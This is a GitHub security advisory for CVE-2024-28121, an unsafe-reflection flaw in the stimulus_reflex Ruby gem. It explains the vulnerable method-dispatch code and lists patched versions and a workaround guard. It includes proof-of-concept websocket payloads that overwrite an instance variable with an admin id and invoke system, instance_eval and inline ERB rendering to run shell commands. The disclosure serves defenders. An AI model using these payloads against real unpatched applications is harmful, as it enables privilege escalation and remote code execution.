Skip to content

Arbitrary method call on reflexes

High
marcoroth published GHSA-f78j-4w3g-4q65 Mar 12, 2024

Package

bundler stimulus_reflex (RubyGems)

Affected versions

<= 3.4.1, <= 3.5.0.rc3

Patched versions

3.4.2, 3.5.0.rc4

Description

Summary

More methods than expected can be called on reflex instances. Being able to call some of them has security implications.

Details

To invoke a reflex a websocket message of the following shape is sent:

{ 
  "target": "[class_name]#[method_name]", 
  "args": [] 
}

The server will proceed to instantiate reflex using the provided class_name as long as it extends StimulusReflex::Reflex.
It then attempts to call method_name on the instance with the provided arguments ref:

method = reflex.method method_name
required_params = method.parameters.select { |(kind, _)| kind == :req }
optional_params = method.parameters.select { |(kind, _)| kind == :opt }

if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size
  reflex.public_send(method_name, *arguments)
end

This is problematic as reflex.method(method_name) can be more methods than those explicitly specified by the developer in their reflex class. A good example is the instance_variable_set method.

Read more Let's imagine a reflex that uses `@user` as a trusted variable in an `after_reflex` callback.

This variable can be overwritten using the following message:

{
  "target": "ChatReflex#instance_variable_set", 
  "args": ["@user", "<admin-id>"]
}

Here are other interesting methods that were found to be available for the ChatReflex sample reflex

  • remote_byebug: bind a debugging server
  • pry: drop the process in a REPL session

All in all, only counting :req and :opt parameters helps.
For example around version 1.0 only .arity was checked which allowed access to the system method (.arity == -1)

{
  "target": "ChatReflex#system", 
  "args": ["[command here]"]
}

Using public_send instead of send does not help but the following payloads do not work since :rest parameters are not counted in the current version

{
  "target": "ChatReflex#send", 
  "args": ["system", "[command here]"] 
}
{ 
  "target": "ChatReflex#instance_eval", 
  "args": ["system('[command here]')"]
}

Pre-versions of 3.5.0 added a render_collection method on reflexes with a :req parameter. Calling this method could lead to arbitrary code execution:

{
  "target": "StimulusReflex::Reflex#render_collection", 
  "args": [
    { "inline":  "<% system('[command here]') %>" }
  ]
}

Patches

Patches are available on RubyGems and on NPM.

The patched versions are:

Workaround

You can add this guard to mitigate the issue if running an unpatched version of the library.

1.) Make sure all your reflexes inherit from the ApplicationReflex class
2.) Add this before_reflex callback to your app/reflexes/application_reflex.rb file:

class ApplicationReflex < StimulusReflex::Reflex
  before_reflex do
    ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1]
    allowed = ancestors.any? { |a| a.public_instance_methods(false).any?(method_name.to_sym) }

    raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed
  end
end

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-28121

Weaknesses

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')

The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code. Learn more on MITRE.

Credits